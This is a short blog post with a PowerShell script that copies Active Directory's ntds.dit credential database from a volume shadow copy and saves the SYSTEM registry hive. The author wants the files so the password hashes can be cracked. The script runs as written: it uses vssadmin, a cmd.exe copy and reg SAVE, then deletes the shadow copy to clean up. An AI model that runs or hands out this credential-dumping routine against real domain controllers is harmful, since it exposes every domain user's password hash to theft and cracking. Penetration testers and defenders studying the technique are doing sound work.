PowerShell AD Hash Copy

    I wrote a post a awhile back on how to retrieve and crack active directory hashes but the entire process is manual.  I had this bright idea that I'd automate the Windows side of it using PowerShell.  In my mind, I had the general flow -- create a directory for the files, create a shadow copy, copy the ntds.dit file from the shadow copy, expert SYSTEM from the registry, and then clean up the mess after I get my files.  Funny thing happened, the part where I copy from the shadow copy didn't work.  Turns out, PowerShell doesn't all you (or doesn't easily allow you) to access the shadow copy.

    At that point, I was sorted of committed to my approach and I called cmd.exe to get around the issue.  Seems kind of weird that PowerShell, a tool for administrators, is unable to copy items out of the shadow copy.  Anyway, my code is never elegant but it is functional:

    Clear
    $DirPath = 'C:\Hashes'
      If(!(test-path $DirPath))
      {
        New-Item -ItemType Directory -Force -Path $DirPath
      }
    $String = (vssadmin Create Shadow /for=C:) | Out-String
    $Regex = [Regex]::new("(?<={)(.*)(?=})")
    $Match = $Regex.Match($String)           
    $ShadowID = "{" + $Match.Value + "}"
    $CopyNum = ($String -split '\\')[6]
    $FullPath = $("\\?\GLOBALROOT\Device\") + $($CopyNum -Replace('\n','')) + $("\windows\ntds\ntds.dit")
    $DestPath = "C:\Hashes"
    cmd.exe /c "copy $FullPath c:\Hashes\"
    reg SAVE HKLM\SYSTEM c:\Hashes\SYSTEM
    vssadmin delete shadows /shadow=$ShadowID /quiet



    © 2020 sevenlayers.com